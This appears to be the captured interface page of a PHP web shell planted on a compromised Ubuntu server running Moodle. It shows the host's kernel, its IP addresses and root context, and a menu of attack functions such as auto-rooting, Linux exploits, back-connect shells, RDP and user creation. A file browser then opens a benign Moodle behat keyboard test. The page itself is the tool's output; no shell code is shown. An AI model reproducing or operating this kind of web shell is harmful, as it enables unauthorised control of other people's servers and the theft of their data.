Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
admin /
tool /
behat /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
fixtures
[ DIR ]
drwxrwxrwx
data_generators.feature
18.51
KB
-rwxrwxrwx
datetime_strings.feature
1.08
KB
-rwxrwxrwx
edit_permissions.feature
4.52
KB
-rwxrwxrwx
get_and_set_fields.feature
10.55
KB
-rwxrwxrwx
get_and_set_fields_in_containe...
1.5
KB
-rwxrwxrwx
i_am_on_page.feature
5.18
KB
-rwxrwxrwx
inplaceeditable.feature
1.29
KB
-rwxrwxrwx
keyboard.feature
1.93
KB
-rwxrwxrwx
list_steps.feature
1.88
KB
-rwxrwxrwx
loginout.feature
4.4
KB
-rwxrwxrwx
manipulate_forms.feature
1.2
KB
-rwxrwxrwx
nasty_strings.feature
2.38
KB
-rwxrwxrwx
test_environment.feature
304
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : keyboard.feature
@tool_behat Feature: Verify that keyboard steps work as expected In order to use behat step definitions As a test writer I need to verify that the keyboard steps work as expected @javascript Scenario: Typing keys into a field causes them to be input Given the following "users" exist: | username | email | firstname | lastname | password | | saffronr | saffron.rutledge@example.com | Saffron | Rutledge | flowerpower | Given I click on "Log in" "link" And I click on "Username" "field" When I type "saffronr" And I press the tab key And I type "flowerpower" And I press enter Then I should see "You are logged in as Saffron Rutledge" @javascript Scenario: Using tab changes focus to the next or previous field Given I click on "Log in" "link" And I click on "Username" "field" And the focused element is "Username" "field" When I press the tab key Then the focused element is "Password" "field" And I press the shift tab key And the focused element is "Username" "field" @javascript Scenario: Using the arrow keys allows me to navigate through menus Given the following "users" exist: | username | email | firstname | lastname | | saffronr | saffron.rutledge@example.com | Saffron | Rutledge | And I log in as "saffronr" And I click on "Saffron Rutledge" "link" in the ".usermenu" "css_element" When I press the up key Then the focused element is "Log out" "link" @javascript Scenario: The escape key can be used to close a dialogue Given the following "course" exists: | fullname | C1| | shortname | C1 | And I log in as "admin" And I am on "C1" course homepage And I navigate to course participants And I press "Enrol users" And "Enrol users" "dialogue" should be visible When I press the escape key Then "Enrol users" "dialogue" should not be visible
Close